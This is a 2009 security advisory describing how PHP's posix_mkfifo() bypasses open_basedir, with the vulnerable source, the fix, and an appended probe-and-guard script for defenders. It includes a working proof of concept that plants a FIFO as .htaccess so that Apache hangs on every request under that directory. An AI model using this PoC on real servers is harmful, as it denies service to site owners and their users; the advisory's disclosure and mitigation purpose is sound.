[ PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ]
Author: Grzegorz Stachowiak
Date:
- Dis.: 25.09.2009
- Pub.: 29.09.2009
Risk: Low
Affected Software:
- PHP 5.3.0
- PHP 5.2.11 and prior
--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.
http://lu2.php.net/manual/en/function.posix-mkfifo.php
--- 1. PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ---
posix_mkfifo — Create a fifo special file (a named pipe)
posix_mkfifo() creates a special FIFO file which exists in the file system and acts as a bidirectional communication endpoint for processes.
The function does not check open_basedir, so even with open_basedir enabled we can create a FIFO in any directory the PHP process can write to. Placing the FIFO where Apache expects a regular file (for example as .htaccess) "freezes" Apache for that directory: every request under it hangs, which denies access to the whole writable folder.
---ext/posix/posix.c---
PHP_FUNCTION(posix_mkfifo)
{
	char *path;
	int path_len;
	long mode;
	int result;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl", &path, &path_len, &mode) == FAILURE) {
		RETURN_FALSE;
	}

	if (PG(safe_mode) && (!php_checkuid(path, NULL, CHECKUID_ALLOW_ONLY_DIR))) { [1]
		RETURN_FALSE;
	}

	result = mkfifo(path, mode);
	if (result < 0) {
		POSIX_G(last_error) = errno;
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
---ext/standard/file.c---
[1]. posix_mkfifo() checks only safe_mode (php_checkuid), and only when safe_mode is on. Unlike the stream-based file functions in ext/standard/file.c, which go through the plain-files wrapper and its php_check_open_basedir() call, the user-supplied path is handed straight to mkfifo(2) with no open_basedir check at all. The fix is a php_check_open_basedir() call on path before mkfifo(); PHP 5.2.12/5.3.1 added it.
---example0 (5.2.11/5.3.0)---
x@x-desktop:/var/www/$ php -v
PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies
|----------------------------------------------------------------|
x@x-desktop:/var/www$ php -r "echo ini_get('open_basedir').PHP_EOL;"
/var/www:/tmp
x@x-desktop:/var/www$
|----------------------------------------------------------------|
x@x-desktop:/var/www$ cat fifo.php
<?php
// /home/y/www is outside open_basedir (/var/www:/tmp), yet the call succeeds.
posix_mkfifo('/home/y/www/.htaccess', 0777);
?>
|----------------------------------------------------------------|
x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:31-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 25 [text/plain]
0K -> [100%]
(24.41 KB/s) - `config.txt' saved [25/25]
|----------------------------------------------------------------|
x@x-desktop:/var/www$ php fifo.php
x@x-desktop:/var/www$
|----------------------------------------------------------------|
x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:43-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response...
|----------------------------------------------------------------|
Apache tries to open .htaccess while processing the request, but opening a FIFO for reading blocks until some process opens it for writing, and a FIFO cannot be read like a regular file anyway. The request never completes, so nothing in that directory or any of its subdirectories can be served; every worker that touches the directory is stuck the same way.
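The following PHP script is an added example and is not part of the original advisory. It does three things a practitioner would want around this bug: it probes a PHP build for the bypass by running posix_mkfifo() under a tight open_basedir in a child interpreter (so the unrestricted parent can delete whatever the child created), it wraps posix_mkfifo() in a userland guard that refuses paths outside the configured open_basedir, and it scans a document root for stray FIFOs such as a planted .htaccess. All paths (the obd_inside/obd_outside names, /tmp/should_not_exist.fifo) are constructed for the demo; the script assumes a POSIX host with ext/posix loaded and shell_exec() enabled.

```php
<?php
// Added example, not from the advisory: probe, guard and scan for the
// posix_mkfifo() open_basedir bypass. Path names below are hypothetical.

// True if $path lies inside one of the open_basedir entries in $bases
// (PATH_SEPARATOR-delimited, as ini_get('open_basedir') returns it).
function path_within_open_basedir(string $path, string $bases): bool
{
    if ($bases === '') {
        return true;                       // restriction not configured
    }
    // The FIFO does not exist yet, so resolve its parent directory instead.
    $parent = realpath(dirname($path));
    if ($parent === false) {
        return false;
    }
    foreach (explode(PATH_SEPARATOR, $bases) as $base) {
        $base = realpath($base);
        if ($base === false) {
            continue;
        }
        $base = rtrim($base, DIRECTORY_SEPARATOR);
        if ($parent === $base
            || strpos($parent . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) === 0) {
            return true;
        }
    }
    return false;
}

// Drop-in replacement that enforces open_basedir before calling mkfifo().
function guarded_mkfifo(string $path, int $mode): bool
{
    if (!path_within_open_basedir($path, (string) ini_get('open_basedir'))) {
        trigger_error("guarded_mkfifo(): $path is outside open_basedir", E_USER_WARNING);
        return false;
    }
    return posix_mkfifo($path, $mode);
}

// Run posix_mkfifo() with open_basedir limited to a scratch directory, in a
// child interpreter. Returns true if the FIFO appeared outside that directory,
// i.e. this build still has the bypass. The parent has no open_basedir set,
// so it can remove the FIFO afterwards.
function build_has_mkfifo_bypass(): bool
{
    $tmp     = sys_get_temp_dir();
    $inside  = $tmp . '/obd_inside_' . getmypid();          // hypothetical scratch dir
    $outside = $tmp . '/obd_outside_' . getmypid() . '.fifo'; // target outside it
    mkdir($inside, 0700);
    $php  = defined('PHP_BINARY') ? PHP_BINARY : 'php';
    $code = 'posix_mkfifo(' . var_export($outside, true) . ', 0600);';
    shell_exec($php . ' -d open_basedir=' . escapeshellarg($inside)
             . ' -r ' . escapeshellarg($code) . ' 2>/dev/null');
    $created = file_exists($outside) && filetype($outside) === 'fifo';
    if ($created) {
        unlink($outside);
    }
    rmdir($inside);
    return $created;
}

// Defender's check: list every FIFO under a document root. A planted
// .htaccess FIFO shows up here ("find DOCROOT -type p" does the same from a shell).
function find_fifos(string $root): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $entry) {
        if ($entry->getType() === 'fifo') {
            $hits[] = $entry->getPathname();
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    printf("posix_mkfifo() ignores open_basedir on this build: %s\n",
           build_has_mkfifo_bypass() ? 'yes (bypass present)' : 'no');

    // Guard in action: open_basedir can only be tightened at runtime, so
    // limiting it to the cwd makes the guard refuse a FIFO in /tmp.
    ini_set('open_basedir', getcwd());
    var_dump(guarded_mkfifo('/tmp/should_not_exist.fifo', 0600));

    // Anything listed here is worth investigating on a web host.
    print_r(find_fifos(getcwd()));
}
```

Run it as the same user the web server runs as; the probe reports the bypass only if that user can write to the temp directory, which is exactly the precondition the advisory relies on. Note that the guard is a userland mitigation for code you control: it does not protect a shared host where an attacker can call posix_mkfifo() directly, so on an affected build the real fixes are upgrading PHP or adding posix_mkfifo to disable_functions.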
--- 3. Contact ---
Author: Grzegorz Stachowiak
Email: stachowiak {a|t} analogicode.pl